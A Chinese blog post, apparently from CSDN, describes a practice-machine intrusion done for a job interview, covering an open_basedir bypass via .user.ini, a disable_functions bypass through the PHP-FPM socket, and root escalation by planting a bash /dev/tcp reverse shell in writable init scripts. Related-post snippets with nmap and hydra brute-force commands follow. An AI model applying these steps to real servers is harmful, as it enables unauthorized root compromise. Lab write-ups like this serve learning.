记一次面试打靶机学到的三个技巧

最新推荐文章于 2022-11-03 16:51:44 发布
最新推荐文章于 2022-11-03 16:51:44 发布
阅读量785 收藏 3
点赞数
分类专栏: 灰色是最美的颜色 文章标签: 渗透测试 linux提权手法 绕过函数限制 突破webshell目录限制 中国蚁剑
辛苦原创,请勿盗取。
本文链接:https://blog.csdn.net/shuryuu/article/details/106525999
版权

获取webshell的操作就不铺开讲了,都是常规手法。

 

拿到webshell之后,通过phpinfo看到disable_functions配置限制的函数,且目录权限受到open_basedir的限制,能执行系统命令的函数都被禁用,常规蚁剑提供的绕过方式也都被封锁,但是从phpinfo文件里发现系统上运行着FPM/FastCGI和nginx。

 

一、突破webshell目录限制:

在当前目录下新建.user.ini文件添加open_basedir绕过php.ini的全局限制。

open_basedir = :/

 

二、绕过disable_functions:

然后通过蚁剑进入文件管理发现tmp目录下有/tmp/php-cgi-56.sock文件,可以利用蚁剑插件绕过disable_functions,攻击fpm,直接与fpm通信,利用fpm绕过disable_functions。

 

之后用msf生成linux木马,通过绕过disable_functions得到的webshell执行木马,反弹交互式shell到自己的服务器。

 

三、提权手法:

通过提权脚本发现服务器上有部分应用的配置文件具有可写权限,且用root权限运行,如:

/etc/init.d/pure-ftpd

/etc/init.d/php-fpm-56

/etc/init.d/nginx

 

将反弹shell的语句:nohup bash -i >& /dev/tcp/xx.xx.xx.xx/80 0>&1 & 写入配置文件中,服务器开启监听,等待应用重启或者查看状态等,我们自己的服务器将收到root反弹回来的shell。

白夜鬼魅
关注
专栏目录
PHP绕过open_basedir限制操作文件的方法
12-20
0x00 预备知识 关于open_basedir open_basedir是php.ini中的一个配置选项 它可将用户访问文件的活动范围限制在指定的区域, 假设open_basedir=/home/wwwroot/home/web1/:/tmp/,那么通过web1访问服务器的用户就无法获取服务器上除了/home/wwwroot/home/web1/和/tmp/这两个目录以外的文件。 注意用open_basedir指定的限制实际上是前缀,而不是目录名。 举例来说: 若”open_basedir = /dir/user”, 那么目录 “/dir/user” 和 “/dir/user1″都是可以访
open_basedir php.ini,利用.user.ini设置open_basedir加强php系统安全性
weixin_34449682的博客
03-10 681
利用.user.ini设置open_basedir加强php系统安全性,从而限制PHP脚本动作只发生在指定目录里面,从而一定程度加强系统安全性。1、.user.ini配置要使.user.ini生效,需要修改php.ini 中的这两个参数#http://php.net/manual/zh/configuration.file.per-user.phpuser_ini.filename = ".use...
渗透测试-靶机打靶思路与方法
lza20001103的博客
08-18 4394
渗透测试-靶机打靶思路与方法
纪念第一次面试安服-靶机测试过程以及思路
王明的博客
12-29 1372
信息收集、漏洞挖掘、sql注入、文件包含、账户提权、清除日志、预留后门
web安全学习笔(一) OWASPBWA--靶机搭建
qycc3391的博客
02-14 8153
为了学习web安全,需要搭建一个用来攻击的靶机,OWASP,Open Web Application Security Project, 提供了许多用于学习安全学习的项目。 这里使用The Broken Web Applications (BWA) Project, 提供一个虚拟机的克隆,包含了含有漏洞的网站,可以使用vmware workstation 打开。此项目的优点是,直接提供了虚拟机的克...
OWASP靶机、安全学习、测试
05-24
在信息安全中OWASP TOP 10 是渗透测试人员都会涉及到的一个项目,意思是10项最严重的Web 应用程序安全风险列表,该列表总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞。这里包括: A1—注入 A2—失效的...
靶机 51 程序
05-29
#include #define u8 unsigned char #define u16 unsigned int #define u32 unsigned long //数码管段选 u8 code LED_TAB[12]={0x3F,0x06,0x5B,0x4F,0x66,0x6D,0x7D,0x07,0x7F,0x6F,0X40,0X00};...
靶机练习 narak ,个人学习心得
09-08
Nmap 是一个功能强大的扫描工具,可以帮助我们检测到靶机上的开放端口和服务。例如:`nmap -sC -sV 192.168.71.129 -n -vv -min-rate=2000`。这个命令可以帮助我们扫描靶机的端口服务。 Web 页面登录 在扫描到靶机...
vulhub渗透测试靶机学习1
08-08
结果显示,Lampiao靶机开放了22、80和1898三个端口。 针对22端口(SSH),通常会尝试密码爆破,使用hydra工具,例如`hydra -l root -P passwords.txt -V -t 10 ssh://192.168.85.133`。如果爆破失败,可能需要寻找...
sqli-labs-master.zip sql注入的学习靶机
最新发布
01-18
sql注入的学习靶机,由于github经常挂,这里特提供大家下载。
2020最新渗透测试靶机和工具及教程
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
「干货」XCTF Web安全入门练习靶场全部通关教程
橙留香Park的博客
04-13 7022
转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球... ...
一道靶场面试题的解题思路
weixin_44508748的博客
06-11 1220
一、缘起 群里老哥丢出来一个某厂的面试靶场,跟着大佬学了些思路,录如下。 整体流程:sql注入读取网站配置文件>拿到tomcat登录账号密码>登录tomcat上传war包>getshell。以下是脱敏后录的详细过程: 二、 初探 目标是一个阉割版ecshop搭建的商城系统,利用已公开的漏洞无法拿下… 目标:http://1x.x.x.x:8080/eshop/UserLogin.jsp 直接web路径访问端口:http://1x.x.x.x:8080/发现tomcat的管理界面入口:
通关某公司面试靶场
hackzkaq的博客
06-18 1254
更多渗透技能,10余本电子书+渗透工具,免费送 公众号:白帽子左一 作者:掌控安全-xiaoc 一、探测IP 首先打开时候长这个样 一开始感觉是迷惑行为、试了试/admin、/login这些发现都没有 随后F12查看网络、看到几个js文件带有传参 就丢sqlmap跑了一下无果放弃 随后也反查了域名一下、发现没有域名、是阿里云的 这里突然醒悟、我第一步是信息收集。 kali linux启动,nmap 启动,直接常规扫描一波,发现开启了这么多 ftp和ssh可以爆破,但因为是靶场弱口令暂时不想了 s
一次网络安全渗透测试实战指南
kali_Ma的博客
10-25 4590
基于一次授权的渗透把一些思路整理一下,本次的重点在以洞打洞原则发现一个小洞顺藤摸瓜发现更多的高危甚至严重问题,像我们日常渗透有这样一步步思路进行收获都不小,当然了运气可以省很大部分时间和心思,一步到位的欧皇也是存在。
一次详细的实战渗透
蚁景网安学院
11-03 2226
一次授权的渗透测试,过程比较详细,充满了巧合,也算比较有意思,直接录一下。整体来说难度不大,没有域,难点在免杀,能拿报表系统是巧合,转发上线没意外,似乎内网环境比较大。
一次内网靶场渗透测试
m0_60571990的博客
10-13 1248
一次内网靶场渗透测试
一次网站的渗透测试
Hacker_DB的博客
04-14 859
朋友叫我帮忙,对一个网站做一下测试。主要目标是看看能不能进入服务器,收集一些建站者信息。 朋友平时待我不薄,此时怎可出言拒绝?经过授权后,直接开搞! (情景发生时间距今较久,请各位读者酌情参考) 用扫描器扫了一下,没有发现漏洞。发现网站存在CDN: 看了下历史解析录,还好不多。通过判断,确定最后一条为真实IP: 查看下IP绑定的网站,查到3个域名,其中一个无法访问,另一个是个后台: 我们先来看这个后台: 随便输入一个账号和密码,提示数据不存在: 扫了下目录,只扫出个upl
网络安全必学渗透测试流程
kali_Ma的博客
02-25 1490
这个靶场是一个对渗透新手很友好的靶场。而且,该靶场包含了渗透测试的信息收集,漏洞利用和权限提升的全过程,对新手理解渗透测试的流程有很好的帮助。 靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Hundred 靶场基本情况: KALI靶机:192.168.1.3/24 主机:192.168.1.146/24 目标:普通用户flag和管理员flag 信息收集阶段: nmap -sn 192.168.1.0/2 sudo nmap -v -T4 -p-
怎么做一个windows服务器系统靶机
05-14
要制作一个Windows服务器系统的靶机,你可以按照以下步骤进行: 1. 下载Windows Server操作系统ISO文件,可以从官方网站或其他可靠来源下载。 2. 安装虚拟机软件,例如VMware Workstation或VirtualBox。 3. 在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值